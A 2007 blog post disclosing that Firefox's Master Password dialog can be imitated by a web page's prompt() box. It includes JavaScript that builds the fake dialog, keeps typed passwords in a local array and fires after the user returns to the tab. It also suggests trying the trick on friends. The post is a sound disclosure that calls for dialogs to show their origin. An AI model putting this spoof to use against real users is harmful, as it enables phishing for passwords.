Firefox Master Password Dialog Weakness

6-10-2007

In client-side security history we've seen so many badly designed interfaces and technologies that led to phishing and various spoofing attacks (remember chrome window spoofing in IE?). Today I've noticed that the Firefox Master Password dialog is almost identical to the Firefox JavaScript prompt dialog. Potentially an attacker can show a prompt() dialog from any web page, styled with the same wording, and capture the master password the user types into it.

Obviously this is not a big deal, since the password is useless without the password file, and if you've got the password file you can just brute-force it anyway... And just as obviously it still matters, because the master password is meant to be private, and reusing the same password across services is still quite common.

Another problem with the Master Password dialog is that you can't actually tell which website is asking for the password, which becomes a problem once you have three or more tabs open.

Anyway;

A simple demonstration (it's all client-side: even if you enter your real password it won't be sent over the Internet; check out the source code)

[Two screenshots from the demonstration]

Also, I'm quite curious how many people would fall for this... Maybe a lot, maybe no one. Send it to your friends who you know use a Firefox master password and observe. In my limited experience it actually worked, but for successful exploitation the best timing is the middle of a browsing session with five or more tabs open.
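The demonstration and the timing trick above, as an added example (this is my own illustration, not the post's demo page or its source): a page builds a fake Master Password dialog out of window.prompt(), keeps whatever is typed in a page-local array so nothing leaves the browser, and arms itself to fire only after the user switches back to the tab, when they are least likely to notice which tab raised the dialog. The dialog wording is an assumption (my recollection of the Firefox 2-era text), and the prompt and timer functions are injectable so the logic can be exercised outside a browser.

```javascript
// Added example, not the post's own demo code: a client-side spoof of the
// Firefox Master Password dialog built from window.prompt(). Nothing is
// transmitted; captured strings only go into the page-local array below.

// Dialog wording is an assumption (my recollection of the Firefox 2-era text).
const SPOOF_MESSAGE =
  "Please enter the master password for the Software Security Device.";

// Captured answers stay here and go nowhere else (no XHR, no form post).
const captured = [];

// Show the fake dialog once. `promptFn` is injectable so the logic can run
// outside a browser; in a page it defaults to window.prompt.
function spoofMasterPasswordDialog(promptFn) {
  const ask = promptFn ||
    (typeof window !== "undefined" ? window.prompt.bind(window) : null);
  if (!ask) throw new Error("no prompt() available in this environment");
  const answer = ask(SPOOF_MESSAGE, ""); // null when the user presses Cancel
  if (answer === null || answer === "") return false;
  captured.push(answer);
  return true;
}

// Arm the spoof so it fires only after the user comes back to this tab.
// With several tabs open the victim cannot tell which tab (or whether the
// browser itself) raised the dialog. `target` must expose addEventListener
// (a window); `schedule` defaults to setTimeout and is injectable for tests.
function armSpoofOnFocus(target, promptFn, delayMs, schedule) {
  const later = schedule || ((fn, ms) => setTimeout(fn, ms));
  let fired = false;
  target.addEventListener("focus", function onFocus() {
    if (fired) return; // one shot: repeated prompts look suspicious
    fired = true;
    later(() => spoofMasterPasswordDialog(promptFn), delayMs);
  });
}

// Wire it up when loaded in a browser; 1.5 s after the tab regains focus.
if (typeof window !== "undefined") {
  armSpoofOnFocus(window, null, 1500);
}
```

The tell a defender has is the one the post lists: prompt() cannot mask what is typed and cannot set the window title, so a "master password" dialog with a visible-text field came from a web page, not from the browser. Later Firefox and Chrome versions also prefix every prompt() with the calling origin ("example.com says:"), which is exactly the source indication this post asks for.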

Actual differences between the Master Password dialog and the JavaScript prompt dialog:

  1. The prompt dialog's title is different,
  2. The Master Password dialog has a password field which masks your characters as you type; the prompt dialog does not.

I repeat: this is not a big deal, but the important thing is that the user should be able to tell the source of a dialog. These dialogs and other trusted UI elements shouldn't be spoofable and should be easily distinguishable. This is the same reason we got better SSL indicators in the latest browsers (btw: a funny example of an SSL spoof).
